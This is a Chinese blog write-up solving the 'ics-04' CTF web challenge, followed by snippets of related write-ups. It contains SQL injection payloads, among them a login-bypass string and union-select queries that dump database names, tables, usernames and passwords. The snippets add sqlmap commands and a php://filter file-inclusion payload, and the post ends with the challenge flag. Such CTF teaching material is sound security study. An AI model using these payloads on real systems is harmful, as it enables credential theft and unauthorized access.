攻防世界web进阶区之ics-04

最新推荐文章于 2020-10-05 10:20:46 发布
最新推荐文章于 2020-10-05 10:20:46 发布
阅读量325 收藏
点赞数 1
分类专栏: CTF web 文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45756971/article/details/107883626
版权
CTF 同时被 2 个专栏收录
30 篇文章 2 订阅
订阅专栏
web
22 篇文章 0 订阅
订阅专栏

题目:在这里插入图片描述进去点击右上角的注册界面先注册一个账号在这里插入图片描述发现登陆不成功在这里插入图片描述我们可以从那个忘记密码处寻找突破口,经过测试,发现这个页面存在SQL注入漏洞,在用户名框内输入 1’OR(1)OR’ ,页面发生了变化,成功绕过用户名检查。
在这里插入图片描述找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata #
在这里插入图片描述数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=“cetc004”#
在这里插入图片描述表名为user,字段:-1’ union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=“cetc004”#
在这里插入图片描述 用户:-1’ union select 1,2,group_concat(username),4 from cetc004.user#
在这里插入图片描述密码:-1’ union select 1,2,group_concat(password),4 from cetc004.user#
在这里插入图片描述我们可以发现这个题同一个用户可以重复注册,所以我们就用c3tlwDmIn23去注册一个账号,密码随意在这里插入图片描述登录后即可得到flag。
cyberpeace{cbd0d095625e40c9e2e6104f3b6fcbcf}

Blank⁰
关注
专栏目录
攻防世界 web高手进阶 4分题(fakebook、ics-04ics-05、FlatScience)
闵行小鱼塘
07-16 596
继续ctf的旅程,攻防世界web高手进阶的4分题:fakebook、ics-04ics-05、FlatScience
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4613
尝试
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 3万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
攻防世界-Web高手进阶-ics-04
feng的博客
09-12 206
前言 终于自己成功做出来一道题了,信心大增。之前这题我做的时候发现题挂了。今天再来看,发现又好了,而且花了半小时居然做出来了!对于我这样的萌新来说真的是Nice. WP 根据提示,登录和注册页面存在漏洞。我们分别抓包,都进行一波分析。各个页面我都进行了查看,发现没什么发现,因此针对各个页面都进行SQL注入的检测,因为各个界面基本上都有输入,是关于用户名和密码,大概率和数据库相关,可能存在注入。 终于,在 ...
CTF ics-04
艺博东的博客
10-05 9984
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
XCTF ics-04
qq_41941506的博客
05-20 2844
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
攻防世界 web高手进阶 8分题 ics-02
闵行小鱼塘
10-04 621
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是ics-02的writeup
攻防世界web进阶ics-06
gongjingege的博客
07-09 1023
打开链接 到处点了点,发现只有题目描述里的报表中心可以点进去 发现id=1,改了几个数字,发现页面没有变化,看了看源代码,用开发者选项也没有发现,试了试burpsuite抓包,也没发现啥 到网上看了看各位大佬的wp,发现这个题得用burp suite爆破(触及到了我的盲。。。),只能看着大佬的博客,一步步跟着来 抓包后发送给intruder,查看target是否正确,导入字典点击右上角的start attack,开始爆破(发现我的字典里没有2333,刚开始没成功,在字典里加入后才成),点击length自
攻防世界web进阶ics-05
gongjingege的博客
07-29 400
打开链接 看了看源代码,没发现啥,页面到处点点,只有设备维护中心可以进去 再点了一下云平台设备维护中心,发现url栏?page=index url栏看见page,考虑文件包含漏洞 读取index的源代码,参考大佬的wp,用php伪协议php://filter payload:?page=php://filter/read=convert.base64-encode/resource=index.php 得到一段base64,解码 https://tool.chinaz.com/tools/base64.
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4615
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
[xctf]ics-04
胖胖的ALEX
07-10 4393
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-高手进阶ics-04
Sacrifice_li的博客
06-11 815
进来页面是这样的: 注册页面: 我们就尝试随便注册一个用户,然后登陆发现没啥用: 这里还有一个忘记密码可以点击: 可以猜测这里有没有注入漏洞: 我注册的用户名为1,然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。 然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4: 3的位置是回显位置,接下来就是去找数据库名: -1' union select .
攻防世界web进阶ics-04
gongjingege的博客
08-03 236
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 考虑是否存在注入漏洞 只有三个地方可以点,登录,注册,忘记密码 先注册 普通用户登录没什么用,估计得管理员登录 登录和注册页面没有注入点,就忘记密码 测试后存在注入,1’or 1=1#绕过 手工测试,后台过滤了一部分,直接union select, 1’ union select 1,2,3,4# 页面回显正常 查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 485
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目加一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
攻防世界web高手进阶ics-04
weixin_43885355的博客
11-26 1559
攻防世界web高手进阶ics-04 这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是: https://blog.csdn.net/harry_c/article/details/98540820 写得粗糙多多见谅 实操 1、使用命令进行sql注入,猜解到4个数据库 cetc004 information_schema mysql performance_schema 2...
攻防世界web进阶ics-04详解
hxhxhxhxx的博客
08-07 290
攻防世界web进阶ics-04详解题目详解 题目 打开环境,发现就一个登录和注册功能可以用。还有一个用户找回密码功能。 详解 我们发现有三个入口 注册,登录,找回密码 我们使用sqlmap扫描,发现只有找回密码可以进行sql注入 python2 sqlmap.py -r -batch --dbs cert中只有一个表 user 我们看他字段 登录成功获取flag 当然,这是在可以获取到密码的情况 实际上我们并不能一定可以解决 那么我们可以进行重复注册 我们尝试去覆盖他的原来的账号密码,
攻防世界-web-ics-04-从0到1的解题历程writeup
CTF小白的博客
04-15 3063
题目分析 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 尝试发现该靶机环境的主要功能为登陆、注册、找回密码,题目描述也是很直接,漏洞点就在这。 遇事不决先扫描一下网站有没有漏洞 发现在findpwd.php中存在sql注入漏洞 尝试联合查询 -1' union select 1,2,3,4--  -1' union select 1,2,(SELECT ...
2020.4.10 xctf(ics-04)
DSR446的博客
04-20 489
题目提示在登陆、注册页面有SQL注入漏洞 除了忘记密码的那块,其他地方都没找到注入点 用sqlmap在这里跑一下,看有没有注入 获取数据库名: python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" --dbs --batch 获取表名: python sqlmap.py -u "http...
攻防世界WEB进阶之Triangle
harry_c的博客
08-06 1708
攻防世界WEB进阶之Triangle第一步:分析第二步:实操第三步:答案第四步:参考,本文参考的博客是: 第一步:分析 难度系数:4星 题目来源: Hack.lu-2017 题目描述:暂无 第二步:实操 get_pw() XYzaSAAX_PBssisodjsal_sSUVWZYYYb function getARM1(){ var x = stoh(atob(getBase64Image(“fr...
攻防世界ics-06
最新发布
08-12
对不起,你提供的引用内容没有包含任何问题。请提供一个明确的问题,我将很乐意帮助你回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界--ics-06](https://blog.csdn.net/m0_67467924/article/details/129679123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值